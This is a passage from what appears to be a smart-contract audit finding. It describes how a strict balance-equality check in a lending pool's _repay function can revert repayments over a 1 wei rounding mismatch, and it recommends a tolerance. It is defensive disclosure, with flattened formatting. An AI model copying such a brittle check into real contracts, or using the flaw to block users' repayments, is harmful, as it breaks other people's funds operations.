):currentDebtBalance = [(s * I + 10^27 / 2) / 10 ^27] = [(3 * 2 * 10^27 + 10^27 / 2) / 10^27 = 6
line 123
, previousDebtBalance - currentDebtBalance
would be 4
and repaid.assets
is 3
would be reverted.function _repay(AssetOperationParams memory params) internal nonReentrant { 119: uint256 previousDebtBalance = pool.getDebt(params.asset, address(this), params.tokenId); DataTypes.SharesType memory repaid = pool.repay(params.asset, params.amount, params.tokenId,; 121: uint256 currentDebtBalance = pool.getDebt(params.asset, address(this), params.tokenId); 123: if (previousDebtBalance - currentDebtBalance != repaid.assets) { revert NFTErrorsLib.BalanceMisMatch(); } }
This example demonstrates a potential 1 wei mismatch
between previousDebtBalance
and currentDebtBalance
due to rounding in the calculations.
This check seems to cause a denial-of-service (DoS)
situation where repayments
can fail due to small rounding errors.
This issue can occur with various combinations of borrow index
, share amounts
, and repaid assets
Manual Review
Either remove this check or adjust it to allow a 1 wei mismatch
to prevent unnecessary reversion of repayments